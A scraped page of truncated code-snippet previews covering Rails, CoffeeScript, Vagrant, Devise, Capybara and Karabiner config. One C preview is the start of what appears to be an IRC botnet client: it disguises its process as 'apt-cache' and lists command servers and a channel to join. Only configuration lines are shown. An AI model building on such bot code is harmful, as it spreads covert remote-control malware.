This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| module FullErrorMessages | |
| extend ActiveSupport::Concern | |
| # includes errors on this model as well as any nested models | |
| def all_error_messages | |
| messages = self.errors.messages.dup | |
| messages.each do |column, errors| | |
| if self.respond_to?(:"#{column}_attributes=") && (resource = self.send(column)) | |
| messages[column] = resource.errors.messages | |
| end |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # A class-based template for jQuery plugins in Coffeescript | |
| # | |
| # $('.target').myPlugin({ paramA: 'not-foo' }); | |
| # $('.target').myPlugin('myMethod', 'Hello, world'); | |
| # | |
| # Check out Alan Hogan's original jQuery plugin template: | |
| # https://github.com/alanhogan/Coffeescript-jQuery-Plugin-Template | |
| # | |
| (($, window) -> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var active = false; | |
| function changeRefer(details) { | |
| if (!active) return; | |
| for (var i = 0; i < details.requestHeaders.length; ++i) { | |
| if (details.requestHeaders[i].name === 'Referer') { | |
| details.requestHeaders[i].value = 'http://www.google.com/'; | |
| break; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <root> | |
| <item> | |
| <name>F19 to F19</name> | |
| <appendix>(F19 to Hyper (ctrl+shift+cmd+opt) + F19 Only, send escape)</appendix> | |
| <identifier>private.f192f19_escape</identifier> | |
| <autogen> | |
| --KeyOverlaidModifier-- | |
| KeyCode::F19, | |
| KeyCode::COMMAND_L, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define STARTUP 1 | |
| #undef IDENT // Only enable this if you absolutely have to | |
| #define FAKENAME "apt-cache" // What you want this to hide as | |
| #define CHAN "#mint" // Channel to join | |
| #define KEY "bleh" // The key of the channel | |
| int numservers=5; // Must change this to equal number of servers down there | |
| char *servers[] = { | |
| "updates.absentvodka.com", | |
| "updates.mintylinux.com", | |
| "eggstrawdinarry.mylittlerepo.com", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # provision.sh | |
| # | |
| # This file is specified in Vagrantfile and is loaded by Vagrant as the primary | |
| # provisioning script whenever the commands `vagrant up`, `vagrant provision`, | |
| # or `vagrant reload` are used. It provides all of the default packages and | |
| # configurations included with Varying Vagrant Vagrants. | |
| # By storing the date now, we can calculate the duration of provisioning at the |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- mode: ruby -*- | |
| # vi: set ft=ruby : | |
| dir = Dir.pwd | |
| vagrant_dir = File.expand_path(File.dirname(__FILE__)) | |
| Vagrant.configure("2") do |config| | |
| # Store the current version of Vagrant for use in conditionals when dealing | |
| # with possible backward compatible issues. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # app/controllers/sessions_controller.rb | |
| class SessionsController < Devise::SessionsController | |
| # This controller provides a JSON version of the Devise::SessionsController and | |
| # is compatible with the use of SimpleTokenAuthentication. | |
| # See https://github.com/gonzalo-bulnes/simple_token_authentication/issues/27 | |
| def create | |
| # Fetch params |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Capybara.default_wait_time = 20 | |
| Capybara.default_host = DEFAULT_HOST | |
| Capybara.app = Capybara.app_host = DEFAULT_HOST | |
| Capybara.configure do |config| | |
| config.match = :prefer_exact | |
| config.ignore_hidden_elements = false | |
| end | |
| Capybara.run_server = false |